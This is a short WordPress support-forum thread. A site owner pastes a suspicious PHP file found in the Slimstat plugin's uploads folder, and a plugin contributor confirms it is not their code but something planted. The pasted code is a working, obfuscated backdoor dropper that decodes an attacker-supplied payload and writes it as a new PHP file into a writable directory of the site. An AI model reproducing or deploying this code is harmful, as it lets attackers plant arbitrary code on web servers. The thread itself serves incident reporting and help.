Is this a known slimstat php file?

  • Resolved ebakker66

    (@ebakker66)


    7 years, 11 months ago

    Hello Slimstat,
    I found this weard file in a Slimtat folder. Is this a known slimstat php file?
    \wp-content\uploads\wp-slimstat\browscap-db\browscap\browscap-php\resources\3\a\zvqbjhrl.php
    It contains very strange code, such as:
    function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr){global $nfspmbl, $vtwmb;return $zyeiayf ^ $nfspmbl[$vtwintjvkr % strlen($nfspmbl)] ^ $vtwmb[$vtwintjvkr % strlen($vtwmb)];}$vnuonc = implode(“”, array_map(“jzibdoj”, array_values($vnuonc), array_keys($vnuonc)));$vnuonc = @unserialize($vnuonc);if (@is_array($vnuonc)){$vtwintjvkr = array_keys($vnuonc);$vnuonc = $vnuonc[$vtwintjvkr[0]];if ($vnuonc === $vtwintjvkr[0]){echo @serialize(Array(‘php’ => @phpversion(), ));exit();}else{function lrzugsl($pockhvlvjir) {static $oxtys = array();$pockhvlvjsjhbtvle = glob($pockhvlvjir . ‘/*’, GLOB_ONLYDIR);if (count($pockhvlvjsjhbtvle) > 0) {foreach ($pockhvlvjsjhbtvle as $pockhvlvj){if (@is_writable($pockhvlvj)){$oxtys[] = $pockhvlvj;}}}foreach ($pockhvlvjsjhbtvle as $pockhvlvjir) lrzugsl($pockhvlvjir);return $oxtys;}$tghfnmi = $_SERVER[“DOCUMENT_ROOT”];$pockhvlvjsjhbtvle = lrzugsl($tghfnmi);$vtwintjvkr = array_rand($pockhvlvjsjhbtvle);$jlolaswm = $pockhvlvjsjhbtvle[$vtwintjvkr] . “/” . substr(md5(time()), 0, 8) . “.php”;@file_put_contents($jlolaswm, $vnuonc);echo “http://” . $_SERVER[“HTTP_HOST”] . substr($jlolaswm, strlen($tghfnmi));exit();}}}
    Please let me know.
    Thanks
    ebakker

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Contributor Jason Crouse

    (@coolmann)

    7 years, 11 months ago

    Hi,

    that doesn’t look like our code, so you may want to scan your website for vulnerabilities or possible XSS attacks. Someone planted that code to look for other stuff on your server.

    Thread Starter ebakker66

    (@ebakker66)

    7 years, 11 months ago

    Thank you Jason,

    You are right, I have already found several of these weird files on many other places in my wordpress website.

    Greetings,

    Ebakker

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Is this a known slimstat php file?’ is closed to new replies.